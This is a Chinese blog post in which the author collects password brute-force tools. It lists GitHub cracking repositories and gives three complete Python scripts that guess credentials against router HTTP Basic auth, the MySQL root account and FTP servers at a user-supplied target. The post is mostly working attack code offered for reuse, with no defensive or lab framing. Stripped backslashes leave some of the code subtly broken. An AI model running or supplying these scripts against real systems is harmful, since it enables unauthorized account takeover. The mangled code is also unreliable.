=Start=

一直很喜欢收藏东西，再加上现在干的这份工作，所以，没事手上备份一些暴力破解的脚本就很有必要了，虽然说黑客最重要的是自己的编程能力（将想法变现的能力），但是在能力尚未达到之前，可以通过阅读别人的脚本来得到提高（特别是现在有了GitHub这么给力的工具之后，能看到很多人的分享，希望有机会自己也能分享一些不错的东西给大家~~）

---

搜索的tips：

• sqlmap的tamper模块值得学习；
• 在GitHub上搜索“bruteforce”而不是“crack”更易于搜到暴力破解的脚本；
• 在sourceforge.net、FreeBuf、91ri.org等网站上都会有一些不错的发现；

GitHub上的一些链接：

• TheRook/subbrute
• AmineCherrai/bruteforce
• d4rkcat/ftpcrack
• daige/sshcrack
• paramiko/paramiko
• lijiejie/htpwdScan
  lijiejie/sibDomains
• wklken/pytools
• rischanlab/bruteforce_py

一些脚本样例（路由器、MySQL、ftp）：

#!/usr/bin/env python
# coding:utf-8
import base64
import urllib2
import Queue
import threading, re, sys
queue = Queue.Queue()
class Rout_thread(threading.Thread):
    def __init__(self, queue, passwd):
        threading.Thread.__init__(self)
        self.queue = queue
        self.passwordlist = passwd
    def run(self):
        self.user = queue.get()
        for self.passwd in self.passwordlist:
            request = urllib2.Request("http://"+target)
            psw_base64 = "Basic " + base64.b64encode(self.user + ":" + self.passwd)
            request.add_header('Authorization', psw_base64)
            try:
                response = urllib2.urlopen(request)
                print "[+]Correct! Username: %s, password: %s" % (self.user, self.passwd)
                fp3 = open('log.txt', 'a')
                fp3.write(self.user+'||'+self.passwd+'rn')
                fp3.close()
            except urllib2.HTTPError:
                print "[-]password:%s Error!" % (self.passwd)

if __name__ == '__main__':
    passwordlist = []
    line = 20
    threads = []
    global target
    target = raw_input("input ip:")
    fp  = open("user.txt")
    fp2 = open("passwd.txt")
    for user in fp.readlines():
        queue.put(user.split('n')[0])
    for passwd in fp2.readlines():
        passwordlist.append(passwd.split('n')[0])
    #print passwordlist

    fp.close()
    fp2.close()
    for i in range(line):
        a = Rout_thread(queue, passwordlist)
        a.start()
        threads.append(a)
    for j in threads:
        j.join()

#!/usr/bin/env python
#coding=utf-8
import Queue
from threading import Thread
import sys
import MySQLdb
import time

class End():
	def __init__(self):
		self.end = False
	def Finish(self):
		self.end = True
	def GetEnd(self):
		return self.end

class Connection(Thread):
	def __init__(self, queue, TheEnd):
		Thread.__init__(self)
		self.queue = queue
		self.TheEnd = TheEnd

	def run(self):
		while (not self.TheEnd.GetEnd()) and (not self.queue.empty()):
			pwd = self.queue.get()
			try:
				dbConn = MySQLdb.Connect(user = 'root', passwd = pwd, host = "127.0.0.1", db = 'mysql')
			except:
				print "[+]root:" + pwd + " Connect wrong.."
				continue
			print "[+]root:" + pwd + " Connect success.."
			self.TheEnd.Finish()

def main():
	queue=Queue.Queue()
	TheEnd = End()
	pwds = [line.rstrip() for line in open("pass.txt")]
	for pwd in pwds:
		queue.put(pwd)
	initsize = queue.qsize()
	tested = 0
	threads = 8    #修改线程处
	for i in range(0, int(threads)):
		Connection(queue, TheEnd).start()
	while (not TheEnd.GetEnd()) and (not queue.empty()):
		time.sleep(2)
		actsize = queue.qsize()
		tested = initsize - actsize
		print 'use %i password | Remaining %i password ' %(tested, actsize)

if __name__ == '__main__':
	main()

#!/usr/bin/env python
# -*- coding: utf_8 -*-

import ftplib, socket, re, sys, time

def usage():
    if len(sys.argv) != 4:
        print "用法: ftpbrute.py 待破解的ip/domain 用户名列表 字典列表"
        print "实例: ftpbrute.py 127.0.0.1 user.txt pass.txt"
        sys.exit()

def ftp_anon(host):
    try:
        print 'n[+] 测试匿名登陆……n'
        ftp = ftplib.FTP()
        ftp.connect(host, 21, 10)
        ftp.login()
        ftp.retrlines('LIST')
        ftp.quit()
        print 'n[+] 匿名登陆成功……'
    except ftplib.all_errors:
        print 'n[-] 匿名登陆失败……'

def ftp_crack(host, user, pwd):
    try:
        ftp = ftplib.FTP()
        ftp.connect(host, 21, 10)
        ftp.login(user, pwd)
        ftp.retrlines('LIST')
        ftp.quit()
        print 'n[+] 破解成功，用户名：' + user + ' 密码：' + pwd
    except ftplib.all_errors:
        pass

if __name__ == '__main__':
    start_time = time.time()
    usage()
    if re.match(r'd{1,3}.d{1,3}.d{1,3}.d{1,3}', sys.argv[1]):
        host = sys.argv[1]
    else:
        host = socket.gethostbyname(sys.argv[1])
    userlist = [x.rstrip() for x in open(sys.argv[2])]
    passlist = [x.rstrip() for x in open(sys.argv[3])]
    print '[+] Target:', host
    print '[+] Userlist:', len(userlist)
    print '[+] Passlist:', len(passlist)
    ftp_anon(host)
    print 'n[+] 暴力破解测试中……n'
    for user in userlist:
        for pwd in passlist:
            ftp_crack(host, user, pwd)
    print 'n[+] 破解完成，用时： %d 秒' % (time.time() - start_time)

……待续……

在执行过程中的经验总结：

1. 暴力破解——字典是决定性因素（用户名字典、密码字典）；
2. 如果想要快速得到结果，先使用现成的工具，而不是自己重复造轮子（不过自己需要明白其中的原理）；
3. 合理利用/结合现成的工具，回达到事半功倍的效果。

=END=